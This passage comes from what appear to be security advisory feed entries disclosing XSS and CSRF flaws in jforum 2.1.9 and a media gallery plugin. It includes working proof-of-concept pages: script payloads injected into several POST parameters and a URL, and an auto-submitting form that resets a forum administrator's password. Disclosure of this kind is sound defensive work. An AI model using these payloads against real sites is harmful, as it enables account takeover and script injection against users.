color="#FF00FF">&quot;javascript:alert(2);&quot;</font>\'&gt;</font><font color="#0000FF">&lt;/<font color="#808000">form</font>&gt;</font>'<br /> window.frames[0].document.body.innerHTML = html<br /> window.frames[0].document.forms[0].submit()<br /> } catch(e) {<br /> go2()<br /> }<br /> }<br /> <font color="#0000FF">&lt;/<font color="#808000">script</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">iframe</font> <font color="#800080">onload</font>=<font color="#FF00FF">&quot;window.setTimeout('</font>go()', 99)&quot; <font color="#800080">src</font>=<font color="#FF00FF">&quot;about:blank&quot;</font> <font color="#800080">style</font>=<font color="#FF00FF">&quot;visibility:hidden&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;/<font color="#808000">iframe</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">script</font>&gt;</font><br /> window.setTimeout('go2()', 3333)<br /> <font color="#0000FF">&lt;/<font color="#808000">script</font>&gt;</font><br /> <font color="#0000FF">&lt;/<font color="#808000">body</font>&gt;</font><br /> <font color="#0000FF">&lt;/<font color="#808000">html</font>&gt;</font><br /> <br /> <br /> 1.4 The vulnerability exists due to insufficient filtration of user-supplied data in URI after "/admin/plugins/mediagallery/xppubwiz.php" script. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.<br /> <br /> The PoC code below uses "alert()" JavaScript function to display user's cookies: <br /> <br /> <font color=#606060>http://[host]/admin/plugins/mediagallery/xppubwiz.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E/</font>https://www.htbridge.com/advisory/HTB23142Wed, 20 Feb 2013 00:00:00 +0100https://www.htbridge.com/advisory/HTB23134<b>Product:</b> jforum v2.1.9<br><b>Vulnerability Type:</b> Cross-Site Scripting [CWE-79], Cross-Site Request Forgery [CWE-352]<br><b>Risk level: </b>Medium <img src="https://www.htbridge.com/images/risk2.png" style='margin-bottom:4px;'><br /><b>Creater:</b> jforum.net<br><b>Vendor Notification:</b> 2012-12-26 15:49:38<br><b>Public Disclosure:</b> February 13, 2013 <br><b>CVE References:</b> CVE-2012-6445, CVE-2012-6446<br> <b>CVSSv2 Base Scores:</b> 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N), 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)<br> <b>Vulnerability Details:</b> High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in jforum, which can be exploited to perform Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF) attacks.<br /> <br /> <br /> 1) Multiple Cross-Site scripting (XSS) vulnerabilities in jforum: CVE-2012-6445<br /> <br /> 1.1 The vulnerability exists due to insufficient filtration of user-supplied input in "start" HTTP POST parameter in "jforum.page" script when sending any message. A remote attacker can create a specially crafted webpage and execute arbitrary HTML and script code in user's browser in the context of vulnerable website. Successful exploitation requires that victim visits the malicious webpage.<br /> <br /> Malicious webpage example:<br /> <br /> <font color="#0000FF">&lt;<font color="#808000">form</font> <font color="#800080">action</font>=<font color="#FF00FF">&quot;http://[host]/jforum.page&quot;</font> <font color="#800080">method</font>=<font color="#FF00FF">&quot;post&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;f1&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;action&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;insertSave&quot;</font> /&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;module&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;posts&quot;</font> /&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;preview&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;0&quot;</font>/&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;forum_id&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;1&quot;</font> /&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;start&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">'&quot;</font>&gt;</font><font color="#0000FF">&lt;<font color="#808000">script</font>&gt;</font>alert(document.cookie);<font color="#0000FF">&lt;/<font color="#808000">script</font>&gt;</font>' /&gt;<br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;topic_id&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;2&quot;</font> /&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;submit&quot;</font> <font color="#800080">id</font>=<font color="#FF00FF">&quot;btn&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;/<font color="#808000">form</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">script</font>&gt;</font><br /> document.f1.submit();<br /> <font color="#0000FF">&lt;/<font color="#808000">script</font>&gt;</font><br /> <br /> 1.2 The vulnerability exists due to insufficient filtration of user-supplied input in "action" HTTP POST parameter in "jforum.page" script when posting a reply. A remote attacker can create a specially crafted webpage and execute arbitrary HTML and script code in user's browser in the context of vulnerable website. Successful exploitation requires that victim visits the malicious webpage.<br /> <br /> Malicious webpage example:<br /> <br /> <font color="#0000FF">&lt;<font color="#808000">form</font> <font color="#800080">action</font>=<font color="#FF00FF">&quot;http://[host]/jforum.page&quot;</font> <font color="#800080">method</font>=<font color="#FF00FF">&quot;post&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;f1&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;module&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;posts&quot;</font> /&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;disable_html&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;1&quot;</font> /&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;forum_id&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;1&quot;</font> /&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;message&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;123&quot;</font> /&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;quick&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;1&quot;</font> /&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;start&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;0&quot;</font> /&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;topic_id&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;2&quot;</font> /&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;action&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">'&quot;</font>&gt;</font><font color="#0000FF">&lt;<font color="#808000">script</font>&gt;</font>alert(document.cookie);<font color="#0000FF">&lt;/<font color="#808000">script</font>&gt;</font>' /&gt;<br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;submit&quot;</font> <font color="#800080">id</font>=<font color="#FF00FF">&quot;btn&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;/<font color="#808000">form</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">script</font>&gt;</font><br /> document.f1.submit();<br /> <font color="#0000FF">&lt;/<font color="#808000">script</font>&gt;</font><br /> <br /> 1.3 The vulnerability exists due insufficient filtration of user-supplied input in "returnUrl", "forum_id" and "topic_id" HTTP POST parameters in "jforum.page" script. A remote attacker can create a specially crafted webpage and execute arbitrary HTML and script code in administrator's browser in the context of vulnerable website. Successful exploitation requires that victim visits the malicious webpage.<br /> <br /> Malicious webpage example:<br /> <br /> <font color="#0000FF">&lt;<font color="#808000">form</font> <font color="#800080">action</font>=<font color="#FF00FF">&quot;http://[host]/jforum.page&quot;</font> <font color="#800080">method=&quot;post&quot;name</font>=<font color="#FF00FF">&quot;f1&quot;</font> &gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;action&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;doModeration&quot;</font> /&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;log_description&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;&quot;</font> /&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;log_type&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;0&quot;</font> /&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;module&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;moderation&quot;</font> /&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;topicMove&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;1&quot;</font> /&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;returnUrl&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">'&quot;</font>&gt;</font><font color="#0000FF">&lt;<font color="#808000">script</font>&gt;</font>alert(document.cookie);<font color="#0000FF">&lt;/<font color="#808000">script</font>&gt;</font>' /&gt;<br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;forum_id&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">'&quot;</font>&gt;</font><font color="#0000FF">&lt;<font color="#808000">script</font>&gt;</font>alert(document.cookie);<font color="#0000FF">&lt;/<font color="#808000">script</font>&gt;</font>' /&gt;<br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;topic_id&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">'&quot;</font>&gt;</font><font color="#0000FF">&lt;<font color="#808000">script</font>&gt;</font>alert(document.cookie);<font color="#0000FF">&lt;/<font color="#808000">script</font>&gt;</font>' /&gt;<br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;submit&quot;</font> <font color="#800080">id</font>=<font color="#FF00FF">&quot;btn&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">script</font>&gt;</font><br /> document.f1.submit();<br /> <font color="#0000FF">&lt;/<font color="#808000">script</font>&gt;</font><br /> <font color="#0000FF">&lt;/<font color="#808000">form</font>&gt;</font><br /> <br /> <br /> 2) Сross-Site Request Forgery (CSRF) in jforum: CVE-2012-6446<br /> <br /> 2.1 The vulnerability exists due to insufficient verification of the HTTP request origin in "jforum.page" script. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage and change administrator's password.<br /> <br /> PoC (Proof-of-Concept) below will change password to "password" for user with id = 2 (default administrator's ID):<br /> <br /> <font color="#0000FF">&lt;<font color="#808000">form</font> <font color="#800080">action</font>=<font color="#FF00FF">&quot;http://[host]/jforum.page&quot;</font> <font color="#800080">method</font>=<font color="#FF00FF">&quot;post&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;f1&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;action&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;editSave&quot;</font> /&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;module&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;adminUsers&quot;</font> /&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;user_id&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;2&quot;</font> /&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;username&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;username&quot;</font> /&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;email&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;mail@mail.com&quot;</font> /&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;new_password&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;password&quot;</font> /&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;password_confirm&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;password&quot;</font> /&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;viewemail&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;0&quot;</font> /&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;hideonline&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;0&quot;</font> /&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;notifyreply&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;1&quot;</font> /&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;notify_always&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;0&quot;</font> /&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;notify_text&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;0&quot;</font> /&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;notifypm&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;1&quot;</font> /&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;attachsig&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;1&quot;</font> /&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;allowhtml&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;1&quot;</font> /&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;allowbbcode&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;1&quot;</font> /&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;allowsmilies&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;1&quot;</font> /&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;rank_special&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;-1&quot;</font> /&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;submit&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;submit&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;Submit&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;/<font color="#808000">form</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">script</font>&gt;</font><br /> document.f1.submit();<br /> <font color="#0000FF">&lt;/<font color="#808000">script</font>&gt;</font><br /> https://www.htbridge.com/advisory/HTB23134Wed, 13 Feb 2013 00:00:00 +0100